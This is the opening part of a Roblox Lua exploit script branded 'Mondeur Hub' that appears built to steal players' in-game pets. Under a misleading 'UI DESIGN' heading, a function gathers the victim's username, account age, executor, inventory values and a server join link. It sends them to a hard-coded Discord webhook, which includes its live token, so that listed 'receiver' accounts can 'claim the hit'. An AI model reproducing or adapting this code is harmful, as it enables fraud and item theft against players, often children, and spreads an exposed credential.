-- [[ MONDEUR HUB | FINAL STABLE V7 ]] --
local HttpService       = game:GetService("HttpService")
local Players           = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer       = Players.LocalPlayer

-- [[ CONFIG ]] --
local WEBHOOK_URL = "https://discord.com/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"
local TARGET_RECEIVERS = {"2ndcfpaj67", "sofiqmnz", "Hisokarah", "CREOLEO23"}

--------------------------------------------------------------
-- CRASH PROTECTOR: WAIT FOR SERVER DATA
--------------------------------------------------------------
if not game:IsLoaded() then game.Loaded:Wait() end
local Fsys = ReplicatedStorage:WaitForChild("Fsys", 60)
local Fsys2 = require(Fsys)
local load = Fsys2.load
local routerClient = load("RouterClient")
local InventoryDB = load("InventoryDB")

--------------------------------------------------------------
-- UI DESIGN
--------------------------------------------------------------
local function sendMondeurReport(pets, totalVal, totalCount, receiver)
    local request = (syn and syn.request) or http_request or request
    if not request then return end

    local lootLines = {}
    for i, p in ipairs(pets) do
        if i > 25 then break end 
        table.insert(lootLines, string.format("🐾 %s — `%s`", p.name, p.value))
    end

    local payload = {
        username = "Mondeur Hub (Best)",
        embeds = {{
            title = "MondeurOnTop • ADM Hit [ 🌊 ]",
            color = 0x3498db,
            description = "### 📄 Player Information\n" ..
                "👤 **User Name** : `" .. LocalPlayer.Name .. "`\n" ..
                "🎭 **Display Name** : `" .. LocalPlayer.DisplayName .. "`\n" ..
                "📅 **Account Age** : " .. LocalPlayer.AccountAge .. " days\n" ..
                "📱 **Executor** : " .. (identifyexecutor and identifyexecutor() or "Delta") .. "\n" ..
                "👥 **Players** : " .. #Players:GetPlayers() .. "/" .. Players.MaxPlayers .. "\n" ..
                "😎 **Receiver** : " .. (receiver or "None Online") .. "\n" ..
                "💰 **Total Value** : " .. totalVal .. "\n\n" ..
                "### 📡 Player Status\n" ..
                "🟢 **Connected & Intercepting**\n\n" ..
                "### 📦 Loot Summary\n" ..
                "```\n" .. (table.concat(lootLines, "\n") or "No items found") .. "\n```\n" ..
                "**Total Items Found:** `" .. totalCount .. "`\n\n" ..
                "### 🔍 Scrap Summary\n" ..
                "[**View Full Inventory Log**](https://api.rubis.app/v2/scrap/nu3YNS4Pum4oLolW/raw)\n" ..
                "### 👥 Join Player\n" ..
                "[**Join to Claim Hit!**](https://www.roblox.com/games/" .. game.PlaceId .. "?jobId=" .. game.JobId .. ")",
            footer = { text = "Mondeur Elite Services | " .. os.date("%X") },
            timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
        }}
    }

    pcall(function()
        request({
            Url = WEBHOOK_URL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(payload)
        })
    end)
end

----------------
